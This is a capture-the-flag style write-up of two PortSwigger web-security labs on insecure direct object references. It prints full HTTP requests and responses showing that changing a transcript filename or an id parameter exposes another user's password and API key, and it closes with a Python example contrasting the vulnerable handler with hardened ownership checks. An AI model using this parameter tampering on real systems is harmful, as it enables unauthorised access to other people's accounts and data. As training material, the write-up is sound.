Lab: Insecure direct object references

This lab stores user chat logs directly on the server's file system and retrieves them using static URLs.

Solve the lab by finding the password for the user carlos and logging in to their account.

SOLUTION:

We examined the download parameter for saved user chat transcripts, /download-transcript/1.txt, and saw that the response to that request returned the content of 2.txt (System: --- Disconnected --- System: --- Disconnected ---). So we tried modifying the parameter value to look for a possible IDOR vulnerability, changing the name of the txt file to 1.txt, and we obtained the chat of the user carlos. Bingo: the chat, which we should not have had access to, shows his password. We log in with his credentials and the lab is solved.


---------------------


NORMAL REQUEST:


GET /download-transcript/2.txt HTTP/2
Host: 0a0d005604aac6cf82f06662004900cb.web-security-academy.net
Cookie: session=LZwlXimaOoz4WV0XhoUqCEnoVmwzBlG2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a0d005604aac6cf82f06662004900cb.web-security-academy.net/chat
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers



NORMAL RESPONSE:

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="2.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 61

System: --- Disconnected ---<br/>System: --- Disconnected ---


-----------

REQUEST WITH THE TXT FILENAME CHANGED TO 1:

GET /download-transcript/1.txt HTTP/2
Host: 0a0d005604aac6cf82f06662004900cb.web-security-academy.net
Cookie: session=LZwlXimaOoz4WV0XhoUqCEnoVmwzBlG2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a0d005604aac6cf82f06662004900cb.web-security-academy.net/chat
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers

RESPONSE WITH THE TXT FILENAME CHANGED TO 1:


HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520

CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is d587wx4vvub1vo3dbf64. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!



----------------

Lab: User ID controlled by request parameter

NORMAL REQUEST:

GET /my-account?id=wiener HTTP/2
Host: 0a28001f035e6e2881b6bce500b10065.web-security-academy.net
Cookie: session=QNTnqTALdBRRwCbdWHAmtGMtWi1g7p9y
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a28001f035e6e2881b6bce500b10065.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers



NORMAL RESPONSE:


HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 3565

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labs.css rel=stylesheet>
        <title>User ID controlled by request parameter</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>User ID controlled by request parameter </h2>
                            <button id='submitSolution' class='button' method='POST' path='/submitSolution' parameter='answer' >Submit solution</button>
                            <script src='/resources/labheader/js/submitSolution.js'></script>
                            <a class=link-back href='https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                            <a href="/my-account?id=wiener">My account</a><p>|</p>
                            <a href="/logout">Log out</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <h1>My Account</h1>
                    <div id=account-content>
                        <p>Your username is: wiener</p>
                        <div>Your API Key is: fVFRnawn9ykVtL1bv7KY44vNs9a8sTqJ</div><br/>
                        <form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
                            <label>Email</label>
                            <input required type="email" name="email" value="">
                            <input required type="hidden" name="csrf" value="8RRucqnBIG5cF4D2AihH1Ius0RQRyDng">
                            <button class='button' type='submit'> Update email </button>
                        </form>
                    </div>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>


------



REQUEST WITH THE USER PARAMETER SET TO carlos:


GET /my-account?id=carlos HTTP/2
Host: 0a28001f035e6e2881b6bce500b10065.web-security-academy.net
Cookie: session=QNTnqTALdBRRwCbdWHAmtGMtWi1g7p9y
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a28001f035e6e2881b6bce500b10065.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers




RESPONSE WITH THE USER PARAMETER SET TO carlos:



HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 3565

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labs.css rel=stylesheet>
        <title>User ID controlled by request parameter</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>User ID controlled by request parameter </h2>
                            <button id='submitSolution' class='button' method='POST' path='/submitSolution' parameter='answer' >Submit solution</button>
                            <script src='/resources/labheader/js/submitSolution.js'></script>
                            <a class=link-back href='https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                            <a href="/my-account?id=wiener">My account</a><p>|</p>
                            <a href="/logout">Log out</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <h1>My Account</h1>
                    <div id=account-content>
                        <p>Your username is: carlos</p>
                        <div>Your API Key is: NmZRGjarw9JsgzOpv7Xnst2WfwcWvqGI</div><br/>
                        <form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
                            <label>Email</label>
                            <input required type="email" name="email" value="">
                            <input required type="hidden" name="csrf" value="8RRucqnBIG5cF4D2AihH1Ius0RQRyDng">
                            <button class='button' type='submit'> Update email </button>
                        </form>
                    </div>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>
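Both labs on this page fail the same way: the object to return (a transcript file, an account) is chosen from the URL alone, and the server never checks that it belongs to the logged-in session. The following is an added example, not the lab's own code, showing the vulnerable download handler beside hardened versions of both endpoints that resolve ownership server-side. Session tokens, transcript text, API keys and the ownership table are constructed placeholders.

```python
import re

# Constructed sample state modelling the two labs. Tokens, transcript text and
# API keys are placeholders, not values from the lab.
SESSIONS = {"sess-wiener": "wiener", "sess-carlos": "carlos"}
TRANSCRIPTS = {
    "1.txt": "You: Ok so my password is <redacted>. Is that right?\nHal Pline: Yes it is!",
    "2.txt": "System: --- Disconnected ---",
}
TRANSCRIPT_OWNER = {"1.txt": "carlos", "2.txt": "wiener"}  # who each file belongs to
ACCOUNTS = {"wiener": "api-key-wiener", "carlos": "api-key-carlos"}
SAFE_NAME = re.compile(r"[0-9]+\.txt")  # the only filename shape the app should serve


def vulnerable_download(session, filename):
    """The lab's behaviour: the URL alone selects the file; the owner is never checked."""
    if session not in SESSIONS:
        return 401, ""
    return 200, TRANSCRIPTS.get(filename, "")


def download_transcript(session, filename):
    """Hardened /download-transcript/<filename>: bind the requested object to the caller."""
    user = SESSIONS.get(session)
    if user is None:
        return 401, ""
    # Transcripts live on the server filesystem, so reject anything but the expected name shape.
    if not SAFE_NAME.fullmatch(filename):
        return 400, ""
    # Ownership is looked up server-side. Answering 404 rather than 403 avoids confirming
    # to the caller that another user's transcript exists at that name.
    if TRANSCRIPT_OWNER.get(filename) != user:
        return 404, ""
    return 200, TRANSCRIPTS[filename]


def my_account(session, requested_id):
    """Hardened /my-account?id=...: identity comes from the session, never from the parameter."""
    user = SESSIONS.get(session)
    if user is None:
        return 401, ""
    # A mismatching id is an authorization failure, not a lookup key.
    if requested_id is not None and requested_id != user:
        return 403, ""
    return 200, f"Your username is: {user}\nYour API Key is: {ACCOUNTS[user]}"
```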



--------
